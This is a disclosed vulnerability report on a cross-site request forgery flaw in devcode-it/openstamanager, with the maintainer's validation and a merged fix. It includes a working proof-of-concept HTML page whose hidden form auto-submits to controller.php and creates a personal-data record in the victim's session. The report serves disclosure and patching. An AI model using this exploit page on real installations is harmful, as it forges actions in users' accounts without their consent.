Cross-Site Request Forgery (CSRF) in devcode-it/openstamanager

Valid

Reported on

Jul 31st 2021


✍️ Description

Attacker able to create any Personal Data if users visit attacker site.

🕵️‍♂️ Proof of Concept

1.Open the PoC.html In Firefox or safari.

2.now you can check that Personal data with Denomination aaa have been created.

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8000/openstamanager/controller.php?id_module=2" method="POST">
      <input type="hidden" name="id&#95;module" value="2" />
      <input type="hidden" name="id&#95;plugin" value="" />
      <input type="hidden" name="op" value="add" />
      <input type="hidden" name="backto" value="record&#45;edit" />
      <input type="hidden" name="ragione&#95;sociale" value="aaa" />
      <input type="hidden" name="idtipoanagrafica&#91;&#93;" value="6" />
      <input type="hidden" name="cognome" value="" />
      <input type="hidden" name="nome" value="" />
      <input type="hidden" name="piva" value="" />
      <input type="hidden" name="codice&#95;fiscale" value="" />
      <input type="hidden" name="tipo" value="" />
      <input type="hidden" name="indirizzo" value="" />
      <input type="hidden" name="cap" value="" />
      <input type="hidden" name="citta" value="" />
      <input type="hidden" name="provincia" value="" />
      <input type="hidden" name="id&#95;nazione" value="" />
      <input type="hidden" name="telefono" value="" />
      <input type="hidden" name="cellulare" value="" />
      <input type="hidden" name="email" value="" />
      <input type="hidden" name="pec" value="" />
      <input type="hidden" name="codice&#95;destinatario" value="" />
      <input type="hidden" name="hash" value="&#35;tab&#95;0" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

💥 Impact

This vulnerability is capable of create any Personal data.

Fix

Set SameSite attribute of cookies to Lax or Strict.

Occurences

We have contacted a member of the devcode-it/openstamanager team and are waiting to hear back 2 months ago
amammad
2 months ago

Researcher


hey man, I just want to sure you see this report too.

devcode-it/openstamanager maintainer validated this vulnerability 2 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
devcode-it/openstamanager maintainer confirmed that a fix has been merged on 402dca 2 months ago
The fix bounty has been dropped